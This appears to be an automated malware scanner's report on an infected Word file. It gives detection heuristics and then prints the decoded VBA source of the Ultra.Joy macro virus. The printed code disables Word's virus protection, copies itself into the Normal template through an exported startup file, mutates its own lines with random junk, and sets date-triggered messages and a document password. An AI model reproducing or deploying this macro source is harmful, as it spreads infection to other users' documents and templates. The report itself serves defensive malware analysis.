MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The document body provides detailed instructions for removing the Happy99.exe malware, indicating the file itself is likely a lure or part of a malware infection chain. The presence of AutoOpen and AutoClose macros, along with legacy WordBasic markers, suggests malicious VBA code was used to execute or facilitate the infection. The ClamAV detections further confirm the malicious nature of the file.
Heuristics 5
-
ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-39
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14487 bytes |
SHA-256: cfa6ae23745ec8cbc81e222ed5de3e31f98fe33b0555420b4e4b231148cf0726 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-16
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim rsx, rox, xix, xxi As Integer: Dim xxe, xex, exx, exd, cxi, cix, xic, eox, xoe, oxe, cii, rxe, rex, exr, nix, ixn, nxi, lnr, nrl, rnl As String
Randomize
On Error GoTo 79
Options.VirusProtection = Chr(48)
Options.SaveNormalPrompt = Chr(48)
Options.ConfirmConversions = Chr(48)
rt = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
dt = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
If dt > 0 And rt > 0 Then GoTo 79
If dt = 0 Then
Set Joy = NormalTemplate.VBProject.VBComponents
Set hst = ActiveDocument.VBProject.VBComponents
If Month(Now()) = 10 And Day(Now()) = 23 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83) + Chr(32) + Chr(83) + Chr(65) + Chr(89) + Chr(83) + Chr(32) + Chr(72) + Chr(73)
If Month(Now()) = 11 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(74) + Chr(79) + Chr(89)
If Month(Now()) = 12 And Day(Now()) = 25 Then Application.ActiveDocument.Password = "Ultra.Joy"
hst.Item(Cos(Atn(CInt(1)))).Name = Joy.Item(Cos(Atn(CInt(1)))).Name
hst.Item(Cos(Atn(CInt(1)))).Export Application.StartupPath & System.Version & Chr(74) + Chr(79) + Chr(89)
End If
If rt = 0 Then Set Joy = ActiveDocument.VBProject.VBComponents
Joy.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Application.StartupPath & System.Version & Chr(74) + Chr(79) + Chr(89)
With Joy.Item(Cos(Atn(CInt(1)))).codemodule
For j = Chr(49) To Chr(52)
.deletelines Chr(49)
Next j
End With
If dt = 0 Then Joy.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 1, "Sub AutoClose()"
If dt = 0 Then Joy.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 85, "Sub ToolsMarco()"
If dt = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
With Joy.Item(Cos(Atn(CInt(1)))).codemodule
For j = Chr(50) To Joy.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Chr(50)
rsx = Int(Rnd(11) * 2998) + 24: rox = Int(Rnd(15) * 5863) + 33: xix = Int(Rnd(44) * 3544) + 55
cii = Asc(rsx): eox = Chr$(cii + 5): xoe = Chr$(cii - 14): oxe = Chr$(cii + 22): lnr = Chr$(cii - 4)
cix = Asc(rox): rxe = Chr$(cix + 7): rex = Chr$(cix - 16): exr = Chr$(cix + 4): nrl = Chr$(cix - 17)
xic = Asc(xix): nix = Chr$(xic + 9): ixn = Chr$(xic - 18): nxi = Chr$(xic + 8): rnl = Chr$(xic - 33)
cxi = Asc(xxi): xxe = Chr$(cxi + 4): xex = Chr$(cxi - 3): exx = Chr$(cxi + 18): exd = Chr$(cxi - 12)
.replaceline j, Chr(39) & eox & rxe & nix & xoe & rex & ixn & oxe & exr & nix & lnr & nrl & rnl & xxe & xex & exx & exd & xoe & rex & ixn & oxe & exr & nix & rnl & xxe & xex & exx & exd & xoe & eox & rxe & nix & xoe & rex
Next j
End With
79:
If dt <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode() 'WM97/Ultra.Joy by Virus :) Smile
End Sub
' Processing file: /opt/analyzer/scan_staging/545c24d8c934416c9228baee2eefab0b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6666 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' Dim
' VarDefn rsx
' VarDefn rox
' VarDefn xix
' VarDefn xxi (As Integer)
' BoS 0x0000
' Dim
' VarDefn xxe
' VarDefn xex
' VarDefn exx
' VarDefn exd
' VarDefn cxi
' VarDefn cix
' VarDefn xic
' VarDefn eox
' VarDefn xoe
' VarDefn oxe
' VarDefn cii
' VarDefn rxe
' VarDefn rex
' VarDefn exr
' VarDefn nix
' VarDefn ixn
' VarDefn nxi
' VarDefn lnr
' VarDefn nrl
' VarDefn rnl (As String)
' Line #3:
' Line #4:
' ArgsCall Read 0
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.